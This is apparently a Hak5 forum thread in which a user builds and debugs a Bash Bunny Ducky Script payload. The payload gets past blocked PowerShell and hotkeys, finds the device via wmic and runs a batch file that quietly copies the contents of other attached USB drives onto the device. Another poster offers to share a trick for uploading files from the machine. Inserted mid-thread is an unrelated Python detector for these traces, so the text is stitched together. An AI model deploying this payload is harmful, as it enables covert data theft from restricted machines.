Natha_n Posted March 26, 2022
I think the title is pretty self-explanatory. I am looking to write a payload that executes a batch file located in the same directory. Thanks to those who will answer.
dark_pyrro Posted March 27, 2022
So, is this question related to the thread you have already started? If not, describe the scenario and any restrictions (such as not having access to PowerShell, as I understand was the limitation in the other thread).
Natha_n (Author) Posted March 27, 2022
Yes, it is linked to the other thread: I can't use PowerShell. I would like to know if there is a command in Bunny script to run a batch file.
dark_pyrro Posted March 27, 2022
Can you use wmic, or is that a limitation as well on your target system?
Natha_n (Author) Posted March 27, 2022
Yes, I can use wmic (I use it in my batch script). Just powershell.exe is blocked.
dark_pyrro Posted March 27, 2022
There is no command in Ducky script that I know of that can start a batch script on a Windows host. I guess that you want to store the batch script file that you have posted in the other thread on the Bunny, but you want to execute it from the perspective of the Windows target machine. In other words, the Windows target PC should start the bat file from the Bunny storage. To do this you need to get the drive letter of the Bunny (the way I showed you in the other thread), but not using PowerShell since that's a limitation in your target system. This is possible to do without PowerShell if using wmic. It's not that pretty, but it works.
lightduty Posted March 27, 2022
If the batch can be executed in one single line, then you can execute cmd.exe /c --------------- This I know; the folks at hak5.org don't know this trick, but you can execute a batch that automatically will upload files from the machine, or execute a batch to get as much data as you can. (I have the source) PM me.
Natha_n (Author) Posted March 27, 2022
I wrote the payload.txt and the script.bat. Can you tell me if they are correct? For the payload I don't know how to use the switch position (I got it but I didn't use it after).

payload.txt

DUCKY_LANG us
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
GUI
DELAY 100
STRING cmd.exe
ENTER
DELAY 100
STRING for /f "tokens=2 delims==" %b IN ('wmic volume where "Label='BashBunny' and DriveType=2" get DriveLetter /format:value') DO SET letter_BashBunny=%b
ENTER
STRING %letter_BashBunny%
ENTER
STRING cd %letter_BashBunny%\payloads\
ENTER
STRING start /min script.bat
ENTER
STRING exit
ENTER
LED FINISH

script.bat

@echo off
MKDIR %~dp0\copy_directory
FOR /F "tokens=2 delims==" %%u IN ('wmic volume where "drivetype=2 and label<>'BashBunny'" get driveletter /format:list') DO (
    SET usb_key=%%u
    XCOPY /C /Q /G /Y /E "%usb_key%" "%~d0\copy_directory\"
)

Thanks for your replies!
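From the defender's side, the payload above leaves two distinctive traces in process-creation telemetry: a wmic.exe child of cmd.exe querying volumes with a DriveType=2 (removable) filter, and a batch file launched from a drive letter other than the system drive. The following added example (mine, not code from the thread or from Hak5) flags both and reports a chain finding when they occur in sequence. The log lines are constructed for illustration in a flattened "field=value|field=value" layout using Sysmon Event ID 1 field names (ParentImage, Image, CommandLine, CurrentDirectory); the user name, drive letter and SYSTEM_DRIVE constant are assumptions.

```python
"""Added example: flag host-side traces of a wmic-based removable-drive payload
in process-creation events. Log format and samples are constructed, not real."""
import re

# Constructed sample events (field=value pairs separated by '|'); paths, user
# and drive letters are made up for the example.
SAMPLE_EVENTS = [
    ("ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\cmd.exe"
     "|CommandLine=\"C:\\Windows\\System32\\cmd.exe\"|CurrentDirectory=C:\\Users\\alice\\"),
    ("ParentImage=C:\\Windows\\System32\\cmd.exe|Image=C:\\Windows\\System32\\wbem\\WMIC.exe"
     "|CommandLine=wmic volume where \"Label='BashBunny' and DriveType=2\" get DriveLetter /format:value"
     "|CurrentDirectory=C:\\Users\\alice\\"),
    ("ParentImage=C:\\Windows\\System32\\cmd.exe|Image=C:\\Windows\\System32\\cmd.exe"
     "|CommandLine=C:\\Windows\\system32\\cmd.exe /c \"\"E:\\payloads\\script.bat\" \""
     "|CurrentDirectory=E:\\payloads\\"),
    ("ParentImage=C:\\Windows\\System32\\cmd.exe|Image=C:\\Windows\\System32\\wbem\\WMIC.exe"
     "|CommandLine=wmic volume where \"drivetype=2 and label<>'BashBunny'\" get driveletter /format:list"
     "|CurrentDirectory=E:\\payloads\\"),
    ("ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\cmd.exe"
     "|CommandLine=cmd /c C:\\Users\\alice\\build\\run_tests.bat"
     "|CurrentDirectory=C:\\Users\\alice\\build\\"),
    ("ParentImage=C:\\Windows\\System32\\svchost.exe|Image=C:\\Windows\\System32\\wbem\\WMIC.exe"
     "|CommandLine=wmic os get caption|CurrentDirectory=C:\\Windows\\system32\\"),
]

# Assumption: the OS volume is C:. In real use derive this from %SystemDrive%.
SYSTEM_DRIVE = "C:"

# wmic "volume" query filtered on DriveType=2 (removable media), any case/spacing.
WMIC_REMOVABLE = re.compile(r"\bvolume\b.*\bdrivetype\s*=\s*2\b", re.IGNORECASE)
# A drive-letter path ending in .bat/.cmd; group 1 captures the drive letter.
BATCH_PATH = re.compile(r"(?<![\w\\])([A-Za-z]):\\[^\"\s]*?\.(?:bat|cmd)\b", re.IGNORECASE)


def parse_event(line):
    """Split 'k=v|k=v' into a dict. Only the first '=' per field is a separator,
    so wmic filters such as DriveType=2 inside CommandLine survive intact."""
    fields = {}
    for part in line.split("|"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key] = value
    return fields


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_event(fields):
    """Return the names of the rules this single event triggers, in rule order."""
    hits = []
    image = _basename(fields.get("Image", ""))
    parent = _basename(fields.get("ParentImage", ""))
    cmd = fields.get("CommandLine", "")
    cwd_drive = fields.get("CurrentDirectory", "")[:2].upper()

    # Rule 1: cmd.exe spawning wmic to enumerate removable volumes.
    if image == "wmic.exe" and parent == "cmd.exe" and WMIC_REMOVABLE.search(cmd):
        hits.append("wmic_removable_volume_enum")

    # Rule 2: cmd.exe running a batch file whose path, or whose working
    # directory, sits on a drive other than the system drive.
    if image == "cmd.exe":
        drives = {m.group(1).upper() + ":" for m in BATCH_PATH.finditer(cmd)}
        off_system = any(d != SYSTEM_DRIVE for d in drives)
        cwd_off_system = cwd_drive not in ("", SYSTEM_DRIVE)
        if drives and (off_system or cwd_off_system):
            hits.append("batch_from_non_system_drive")
    return hits


def scan(lines):
    """Evaluate every event; report per-event hits and a chain finding when a
    removable-volume enumeration is followed by a batch launch off the system drive."""
    per_event = []
    seen_enum = False
    chain = False
    for idx, line in enumerate(lines):
        hits = check_event(parse_event(line))
        if "wmic_removable_volume_enum" in hits:
            seen_enum = True
        if "batch_from_non_system_drive" in hits and seen_enum:
            chain = True
        if hits:
            per_event.append((idx, hits))
    return {"events": per_event, "chain": chain}


if __name__ == "__main__":
    result = scan(SAMPLE_EVENTS)
    for idx, hits in result["events"]:
        print(f"event {idx}: {', '.join(hits)}")
    print("chain finding:", result["chain"])
```

Run against the constructed events, events 1 and 3 trigger the wmic rule, event 2 triggers the batch rule, the ordinary build script on C: (event 4) and the inventory query from svchost (event 5) stay quiet, and the chain finding is raised. In production the same two rules map onto Sysmon Event ID 1 or Windows Security 4688 with command-line auditing enabled; the drive-letter check is a heuristic, so correlate it with removable-media mount events before alerting.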
dark_pyrro Posted March 27, 2022
Haven't you tried to run the payload? That will tell you if it's correct or not. Why would you want to use GET SWITCH_POSITION in this specific case?
Natha_n (Author) Posted March 27, 2022
I thought we had to get the switch position so that the Bash Bunny knows which payload to execute.
dark_pyrro Posted March 27, 2022
That is set the "hardware way" using the physical switch of the Bunny. In other words, if you put the Bunny in switch position 1, it will execute the payload in the switch1 directory.
Natha_n (Author) Posted March 27, 2022
Ok. Thanks.
Natha_n (Author) Posted April 25, 2022
Hi,

After many attempts and a lot of reading on the subject, I don't understand why my payload does not work. Everything runs normally until you type the command in the cmd.

command:

Q STRING for /f "tokens=2 delims==" %b in ('wmic volume where "Label='BashBunny' and DriveType=2" get DriveLetter /format:value') do set letter_BashBunny=%b

If I do another command like cls it works. Do you have an idea?

ATTACKMODE HID STORAGE
LED R
Q GUI
Q DELAY 100
Q STRING cmd.exe
Q ENTER
Q DELAY 100
Q STRING for /f "tokens=2 delims==" %b in ('wmic volume where "Label='BashBunny' and DriveType=2" get DriveLetter /format:value') do set letter_BashBunny=%b
Q ENTER
Q DELAY 5
Q STRING %letter_BashBunny%
Q ENTER
Q DELAY 5
Q STRING cd %letter_BashBunny%\payloads\
Q ENTER
Q DELAY5
Q STRING start /min script.bat
Q ENTER
Q DELAY 5
Q STRING exit
Q ENTER
LED G
dark_pyrro Posted April 25, 2022
Why are you just using "Q GUI" and not "Q GUI r"? DELAY 5 is a really short delay, almost so short it's not worth putting it there. Even 100 can be short. You also have a DELAY5 that should be DELAY 5.
Natha_n (Author) Posted April 25, 2022
I can't use GUI r because hotkeys are blocked. I will try to lengthen the delay, but from the first command, no text is entered in the cmd.
dark_pyrro Posted April 25, 2022
You most likely have to use quotes and escape special chars using \ to get that string to work.
Natha_n (Author) Posted April 26, 2022
That's what I thought about doing but couldn't find any documentation on it. I put " " at the beginning and at the end, but for the \, do I use it for the ", the ', the /?
dark_pyrro Posted April 26, 2022
The Ducky script documentation is a bit scattered around, in my opinion. If you use the Croc, which also uses Ducky script, it's a bit easier to find since you most often remember that you have seen it somewhere. Payloads on GitHub may also be a source of knowledge. The Croc documentation has some info about escaping chars, not complete though as I see it, but always something. https://docs.hak5.org/key-croc/writing-payloads/advanced-quack-commands Other than that, it's all about trying. Trial and error has worked before in computing history and is still alive as a working method.